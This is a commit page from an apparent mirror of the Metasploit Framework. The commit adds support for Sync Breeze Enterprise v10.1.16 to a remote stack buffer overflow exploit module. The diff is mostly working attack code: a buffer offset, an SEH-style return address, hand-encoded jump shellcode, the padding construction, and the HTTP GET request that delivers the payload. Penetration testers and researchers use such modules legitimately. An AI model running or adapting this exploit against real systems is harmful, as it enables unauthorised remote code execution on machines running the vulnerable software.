infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added new target

MS-2855/keylogger-mettle-extension
wetw0rk 2017-12-01 18:35:45 -06:00
parent fd1681edd9
commit 4cbb5f2619
1 changed files with 45 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
modules/exploits/windows/http/syncbreeze_bof.rb
View File

@ -15,17 +15,18 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Sync Breeze Enterprise GET Buffer Overflow', 'Name' => 'Sync Breeze Enterprise GET Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability This module exploits a stack-based buffer overflow vulnerability
in the web interface of Sync Breeze Enterprise v9.4.28 and v10.0.28, caused by in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,
improper bounds checking of the request in HTTP GET and POST requests and v10.1.16, caused by improper bounds checking of the request in
sent to the built-in web server. This module has been tested HTTP GET and POST requests sent to the built-in web server. This
successfully on Windows 7 SP1 x86. module has been tested successfully on Windows 7 SP1 x86.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Daniel Teixeira', 'Daniel Teixeira',
'Andrew Smith', # MSF support for v10.0.28 'Andrew Smith', # MSF support for v10.0.28
'Owais Mehtab' # Original v10.0.28 exploit 'Owais Mehtab', # Original v10.0.28 exploit
'Milton Valencia (wetw0rk)' # MSF support for v10.1.16
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
@ -53,6 +54,12 @@ class MetasploitModule < Msf::Exploit::Remote
'Offset' => 780, 'Offset' => 780,
'Ret' => 0x10090c83 # JMP ESP [libspp.dll] 'Ret' => 0x10090c83 # JMP ESP [libspp.dll]
} }
],
[ 'Sync Breeze Enterprise v10.1.16',
{
'Offset' => 2495,
'Ret' => 0x1001C65C # POP # POP # RET [libspp.dll]
}
] ]
], ],
'Privileged' => true, 'Privileged' => true,
@ -102,6 +109,9 @@ class MetasploitModule < Msf::Exploit::Remote
when /10\.0\.28/ when /10\.0\.28/
print_status('Target is 10.0.28') print_status('Target is 10.0.28')
return targets[2] return targets[2]
when /10\.1\.16/
print_status('Target is 10.1.16')
return targets[3]
else else
nil nil
end end
@ -156,6 +166,35 @@ class MetasploitModule < Msf::Exploit::Remote
'password' => "rawr" 'password' => "rawr"
} }
) )
when targets[3]
target = targets[3]
jumpcode = "\x25\x4a\x4d\x4e\x55" # and eax,0x554e4d4a
jumpcode << "\x25\x35\x32\x31\x2a" # and eax,0x2a313235
jumpcode << "\x2d\x37\x37\x37\x37" # sub eax,0x37373737
jumpcode << "\x2d\x74\x74\x74\x74" # sub eax,0x74747474
jumpcode << "\x2d\x55\x54\x55\x70" # sub eax,0x70555455
jumpcode << "\x50" # push eax
jumpcode << "\x25\x4a\x4d\x4e\x55" # and eax,0x554e4d4a
jumpcode << "\x25\x35\x32\x31\x2a" # and eax,0x2a313235
jumpcode << "\x2d\x2d\x76\x7a\x63" # sub eax,0x637a762d
jumpcode << "\x2d\x2d\x76\x7a\x30" # sub eax,0x307a762d
jumpcode << "\x2d\x25\x50\x7a\x30" # sub eax,0x307a5025
jumpcode << "\x50" # push eax
jumpcode << "\xff\xe4" # jmp esp
sploit = payload.encoded
sploit << 'A' * (target['Offset'] - payload.encoded.length)
sploit << "\x74\x06\x75\x06"
sploit << [target.ret].pack('V')
sploit << jumpcode
sploit << 'A' * (9067 - (target['Offset'] + payload.encoded.length + 8 + jumpcode.length))
send_request_cgi(
'uri' => '/' + sploit,
'method' => 'GET',
'host' => '4.2.2.2',
'connection' => 'keep-alive'
)
else else
print_error("Exploit not suitable for this target.") print_error("Exploit not suitable for this target.")
end end